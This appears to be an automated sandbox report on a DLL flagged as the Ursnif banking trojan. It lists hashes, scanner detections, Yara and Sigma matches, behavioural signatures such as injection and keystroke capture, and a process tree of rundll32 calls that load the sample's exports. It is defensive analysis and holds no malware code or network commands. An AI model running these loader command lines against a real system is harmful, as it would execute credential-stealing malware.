Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ELQSEuKior

Overview

General Information

Sample Name:ELQSEuKior (renamed file extension from none to dll)
Analysis ID:449061
MD5:2f1e2c8b741594e48eea9cf01e24cdba
SHA1:d6a59cfcfd712ad2b7124a9f812d5c6ed328ab84
SHA256:ff12254275bb4cae4f1225535408dd466bf0a4d41727abca9576dbb427f44014
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains an invalid checksum
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Parent Process Executions
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1084 cmdline: loaddll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6108 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6032 cmdline: rundll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 3236 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 852 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 4604 cmdline: rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Connectdark MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 6000 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5072 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5848 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6132 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • rundll32.exe (PID: 4120 cmdline: rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Mindlake MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 772 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5288 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • conhost.exe (PID: 2100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 5932 cmdline: rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Porthigh MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 4608 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5868 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 5672 cmdline: rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Problemscale MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4848 cmdline: rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,WingGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 4196 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 4020 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4960 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 852 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
ELQSEuKior.dllJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.486237999.000000006E1E1000.00000020.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
      00000015.00000002.507296216.000000006E1E1000.00000020.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
        00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
          00000019.00000002.485057539.000000006E1E1000.00000020.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
            00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              15.2.rundll32.exe.6e1e0000.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                0.2.loaddll32.exe.6e1e0000.0.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                  25.2.rundll32.exe.6e1e0000.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                    21.2.rundll32.exe.6e1e0000.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                      2.2.rundll32.exe.6e1e0000.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                        Click to see the 2 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Conhost Parent Process ExecutionsShow sources
                        Source: Process startedAuthor: omkar72: Data: Command: C:\Windows\system32\cmd.exe /c cd Island, CommandLine: C:\Windows\system32\cmd.exe /c cd Island, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 5672, ProcessCommandLine: C:\Windows\system32\cmd.exe /c cd Island, ProcessId: 5848

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus / Scanner detection for submitted sampleShow sources
                        Source: ELQSEuKior.dllAvira: detected
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: ELQSEuKior.dllVirustotal: Detection: 67%Perma Link
                        Source: ELQSEuKior.dllMetadefender: Detection: 57%Perma Link
                        Source: ELQSEuKior.dllReversingLabs: Detection: 89%
                        Source: ELQSEuKior.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                        Source: ELQSEuKior.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: c:\938\follow-Record\Suffix\observe-element\force.pdb source: loaddll32.exe, 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000002.486289723.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.503913812.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000015.00000002.512153585.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.503906509.000000006E26A000.00000002.00020000.sdmp, ELQSEuKior.dll

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        barindex
                        Yara detected UrsnifShow sources
                        Source: Yara matchFile source: ELQSEuKior.dll, type: SAMPLE
                        Source: Yara matchFile source: 15.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.486237999.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.507296216.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.485057539.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.503861971.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: loaddll32.exe, 00000000.00000002.490259189.00000000010BB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        E-Banking Fraud:

                        barindex
                        Yara detected UrsnifShow sources
                        Source: Yara matchFile source: ELQSEuKior.dll, type: SAMPLE
                        Source: Yara matchFile source: 15.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.486237999.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.507296216.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.485057539.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.503861971.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E223E000_2_6E223E00
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E221C3C0_2_6E221C3C
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2567D90_2_6E2567D9
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2484BB0_2_6E2484BB
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2602BC0_2_6E2602BC
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2503960_2_6E250396
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E23E0790_2_6E23E079
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2351500_2_6E235150
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2261B20_2_6E2261B2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E223E002_2_6E223E00
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E221C3C2_2_6E221C3C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E2567D92_2_6E2567D9
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E2484BB2_2_6E2484BB
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E2602BC2_2_6E2602BC
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E2503962_2_6E250396
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E23E0792_2_6E23E079
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E2351502_2_6E235150
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E223E003_2_6E223E00
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E221C3C3_2_6E221C3C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2567D93_2_6E2567D9
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2484BB3_2_6E2484BB
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2602BC3_2_6E2602BC
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2503963_2_6E250396
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E23E0793_2_6E23E079
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2351503_2_6E235150
                        Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E220990 appears 35 times
                        Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E2200AC appears 101 times
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E220990 appears 68 times
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E2423A9 appears 36 times
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E2200AC appears 200 times
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E2200E0 appears 58 times
                        Source: ELQSEuKior.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                        Source: classification engineClassification label: mal64.troj.winDLL@53/0@0/0
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1124:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2100:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2044:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_01
                        Source: ELQSEuKior.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Connectdark
                        Source: ELQSEuKior.dllVirustotal: Detection: 67%
                        Source: ELQSEuKior.dllMetadefender: Detection: 57%
                        Source: ELQSEuKior.dllReversingLabs: Detection: 89%
                        Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll'
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll',#1
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Connectdark
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll',#1
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Mindlake
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Porthigh
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Problemscale
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,WingGrass
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll',#1Jump to behavior
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,ConnectdarkJump to behavior
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,MindlakeJump to behavior
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,PorthighJump to behavior
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,WingGrassJump to behavior
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll',#1Jump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: ELQSEuKior.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: ELQSEuKior.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: ELQSEuKior.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: ELQSEuKior.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: ELQSEuKior.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: ELQSEuKior.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: ELQSEuKior.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                        Source: ELQSEuKior.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: c:\938\follow-Record\Suffix\observe-element\force.pdb source: loaddll32.exe, 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000002.486289723.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.503913812.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000015.00000002.512153585.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.503906509.000000006E26A000.00000002.00020000.sdmp, ELQSEuKior.dll
                        Source: ELQSEuKior.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: ELQSEuKior.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: ELQSEuKior.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: ELQSEuKior.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: ELQSEuKior.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: ELQSEuKior.dllStatic PE information: real checksum: 0xf3990 should be: 0xeef60
